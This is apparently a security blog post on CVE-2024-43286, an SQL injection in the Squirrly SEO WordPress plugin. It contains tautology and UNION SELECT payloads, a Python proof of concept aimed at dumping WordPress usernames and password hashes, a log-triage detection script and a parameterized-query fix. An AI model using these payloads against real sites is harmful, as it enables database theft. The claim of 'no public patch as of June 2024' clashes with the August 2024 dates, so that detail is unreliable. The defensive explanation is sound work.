The WordPress plugin ecosystem is a double-edged sword: it adds powerful site features, and it regularly adds security risk along with them. A serious vulnerability has surfaced in the Squirrly SEO plugin, tracked as CVE-2024-43286. In this post we break down what happened, how the bug works, look at a simplified code example, and walk through how an attacker could exploit it. Understanding the pattern helps anyone running WordPress secure their site.
What is Squirrly SEO?
Squirrly SEO is one of the most popular SEO plugins for WordPress. It powers over 100,000 active installations, helping sites rank better on search engines with on-page SEO advice, audit tools, and more.
The Vulnerability: CVE-2024-43286
Type: SQL Injection (CWE-89)
Affected Versions: all versions up to and including 12.3.19
Patched Version: no public patch as of June 2024
CVE Page: CVE-2024-43286 on CVE.org
Tracked by: Wordfence Vulnerability Database
Description:
Squirrly SEO failed to properly sanitize user-supplied data before including it in SQL queries. This means an attacker could manipulate a request to inject malicious SQL, accessing, modifying, or deleting data from the database.
Where is the Problem?
The exact source differs across versions, but the vulnerable pattern looked like this (simplified for clarity; the parameter name and the AJAX action used in this post are illustrative, not the plugin's literal identifiers):
// Vulnerable pattern: the request parameter is spliced straight into the SQL text.
$keyword = $_GET['keyword'];
$sql = "SELECT * FROM {$wpdb->prefix}squirrly_data WHERE keyword = '$keyword'";
$results = $wpdb->get_results($sql);
What’s wrong?
The $keyword variable is taken straight from user input (a URL parameter) and interpolated, unescaped, into the SQL string. Anyone who controls that parameter can end the quoted literal early and change the structure and intent of the statement.
Suppose a site runs Squirrly SEO 12.3.19 or earlier. Against the simplified handler above, an attacker could request a URL like this (shown decoded for readability; on the wire the quote, spaces and comment marker are percent-encoded, i.e. keyword=%27%20OR%201%3D1%20--%20):
https://victim.com/wp-admin/admin-ajax.php?action=squirrly_get_data&keyword=' OR 1=1 -- 
This produces the query
SELECT * FROM wp_squirrly_data WHERE keyword = '' OR 1=1 -- '
- The leading quote closes the string literal, OR 1=1 makes the WHERE clause true for every row, and -- (followed by a space, which MySQL requires for this comment form) discards the dangling quote. The attacker gets back the whole table.
With further tweaks, for example a UNION SELECT against the users table, an attacker could extract usernames, email addresses and password hashes.
If the same unescaped pattern feeds a DELETE or UPDATE statement, the consequences are worse still: wholesale deletion or modification of data.
Proof-of-Concept (PoC) Exploit (Python)
import requests

site = 'https://victim.com'   # placeholder target
# UNION SELECT only works when its column count matches the original SELECT *,
# so this payload must be padded with NULL columns until it matches the
# plugin's table. The table prefix is also assumed to be the default wp_.
payload = "' UNION SELECT user_login, user_pass FROM wp_users -- "
params = {
    'action': 'squirrly_get_data',   # illustrative action name, as above
    'keyword': payload               # requests percent-encodes the quote, spaces and --
}
r = requests.get(site + '/wp-admin/admin-ajax.php', params=params, timeout=10)
print(r.status_code)
print(r.text)
*This PoC attempts to dump WordPress usernames and password hashes through the vulnerable parameter; the column count and table prefix have to be adjusted to the target before it returns anything useful.*
Responsible Disclosure and Reference
- Wordfence Advisory
- NIST NVD
- Original Plugin Repo
How can you protect your site?
1. Update the plugin: check for and install any update from the developer. If no fixed release exists, deactivate the plugin until one does.
2. Least privilege: give WordPress its own database user scoped to its own database, never the server's administrative account. An injected query can only do what that user is allowed to do.
3. Web Application Firewall: a WAF such as Wordfence or Sucuri can block requests carrying SQL metacharacters in parameters. That buys time; it is not a substitute for the patch.
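A WAF blocks attempts going forward; for what may already have happened, the web server's access log is the place to look. What follows is an added example written for this post, not code from the original article and not a Wordfence or Sucuri rule: a small Python triage script over constructed combined-format log lines. It URL-decodes the query string of admin-ajax.php requests and flags keyword values containing quotes, comment markers or SQL keywords. The action name squirrly_get_data follows the simplified example earlier in this post and is an assumption, as are the IP addresses and timestamps.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (Apache/nginx "combined" format). The action
# name follows this post's simplified example; it is not confirmed to be the
# plugin's real one, and the addresses and sizes are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Aug/2024:22:10:01 +0000] "GET /wp-admin/admin-ajax.php?action=squirrly_get_data&keyword=wordpress%20seo HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [18/Aug/2024:22:11:42 +0000] "GET /wp-admin/admin-ajax.php?action=squirrly_get_data&keyword=%27%20OR%201%3D1%20--%20 HTTP/1.1" 200 40960 "-" "python-requests/2.31"
203.0.113.9 - - [18/Aug/2024:22:11:43 +0000] "GET /wp-admin/admin-ajax.php?action=squirrly_get_data&keyword=%27%20UNION%20SELECT%20user_login%2Cuser_pass%20FROM%20wp_users%20--%20 HTTP/1.1" 200 2048 "-" "python-requests/2.31"
198.51.100.7 - - [18/Aug/2024:22:12:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, timestamp, request line, status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+)'
)

# Heuristic for SQL metacharacters and keywords inside a decoded parameter
# value. Expect false positives on legitimate text (apostrophes, the word
# "or"), so treat hits as leads to review, not verdicts.
SQLI_RE = re.compile(
    r"""('|"|--|/\*|;|\b(UNION|SELECT|OR|AND|SLEEP|BENCHMARK)\b)""",
    re.IGNORECASE,
)


def suspicious_params(target, watched=("keyword",)):
    """Return {param: decoded value} for watched params that look injected."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    hits = {}
    for name in watched:
        for value in qs.get(name, []):   # parse_qs percent-decodes for us
            if SQLI_RE.search(value):
                hits[name] = value
    return hits


def triage(log_text):
    """Scan admin-ajax.php requests and report the ones carrying SQL-like payloads."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or "admin-ajax.php" not in m.group("target"):
            continue
        hits = suspicious_params(m.group("target"))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "bytes": int(m.group("bytes")),   # a large response to a tautology is telling
                "params": hits,
            })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["status"], f["bytes"], f["params"])
```

On the sample above the script flags the two requests from 203.0.113.9 and ignores the benign keyword lookup and the heartbeat call. The response size is worth keeping in the output: a tautology payload that returns the whole table usually shows up as a response far larger than a normal keyword lookup, which helps separate a successful attempt from a blocked one.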
Plugins should never put user input directly into SQL. Here is the proper fix
// Read the parameter defensively, then bind it instead of interpolating it.
$keyword = isset( $_GET['keyword'] ) ? sanitize_text_field( wp_unslash( $_GET['keyword'] ) ) : '';
// %s binds the value as an escaped, quoted string; the query text never changes.
$sql = $wpdb->prepare(
    "SELECT * FROM {$wpdb->prefix}squirrly_data WHERE keyword = %s",
    $keyword
);
$results = $wpdb->get_results($sql);
With $wpdb->prepare(), the value is escaped and bound as a string literal, so a quote or comment marker inside it cannot alter the structure of the query. Note that prepare() is not an authorization check: an admin-ajax handler should also verify a nonce (check_ajax_referer()) and a capability (current_user_can()) so that only the intended users can reach the query in the first place.
Conclusion
CVE-2024-43286 is a textbook SQL injection affecting all Squirrly SEO versions up to and including 12.3.19. If you use this plugin, patch immediately or disable it until an update is available. Bugs of this kind are preventable with parameterized queries and regular updates; do not get caught by a plugin's sloppy query handling.
If you want more details or custom guidance, contact your hosting support or visit professional security forums.
Stay Secure!
Timeline
Published on: 08/18/2024 22:15:10 UTC
Last modified on: 08/19/2024 12:59:59 UTC